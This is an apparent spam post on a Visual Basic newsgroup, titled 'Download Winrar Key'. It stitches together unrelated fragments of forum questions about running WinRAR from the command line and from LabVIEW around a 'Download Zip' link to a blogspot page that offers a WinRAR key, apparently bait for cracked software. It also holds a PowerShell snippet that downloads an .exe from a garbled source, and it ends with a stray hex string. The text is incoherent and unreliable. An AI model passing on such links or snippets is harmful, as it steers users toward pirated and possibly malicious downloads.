Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]


Groups > comp.lang.basic.visual.misc > #3793

Download Winrar Key

Newsgroups comp.lang.basic.visual.misc
Date 2024-01-08 21:59 -0800
Message-ID <6aec342d-168e-4acf-b0ca-d8a6ed630881n@googlegroups.com> (permalink)
Subject Download Winrar Key
From Janette Leupold <leupoldjanette@gmail.com>

Show all headers | View raw


I have a problem finding the correct way to unrar multiple files with the help of Winrar command.

With a button, I managed to unrar them all, but all in the same time. It's not very efficient...

The best solution is to unrar them sequentialy, but I can't find the correct winrar command to do this.



download winrar key

Download Zip https://1orelrayu.blogspot.com/?qdw=2x5XYC 






I am trying to code a program that will RAR an a folder that contains many subfolders with files in them. WinRAR allows for command line codes to be sent to control WinRAR through the command prompt (I have this working well). What I want to do, is integrate this command line code through the command prompt into a vi. I have tried using the System Exec.vi, but with very little luck. I have set the path for winrar tools to be present at that directory and I have used the "cmd /c" string before my input so that LabVIEW knows its a DOS command. I keep getting an error message that says " 'winrar' is not recognized as an internal or external command, operable program or batch file." I have tried moving the command line codes to the standard input and even the winrar code to that input as well (this only leaves the "cmd /c" as the command to be sent), still no dice. Any suggestions would be most useful. I can provide my code and a list of the command line codes for WinRAR if you need it. Other zipping programs would be another option to take that I am open to, as long as it can be controlled within the LabVIEW environment and that the compression is best.


$source = " -x64-540.exe" -> Download Location

$destination = "$workdir\winrar.exe" -> Location where the file needs to be saved

Invoke-WebRequest $source -OutFile $destination -> Command that executes the download

 35fe9a5643


Back to comp.lang.basic.visual.misc | Previous | Next | Find similar


Thread

Download Winrar Key Janette Leupold <leupoldjanette@gmail.com> - 2024-01-08 21:59 -0800

csiph-web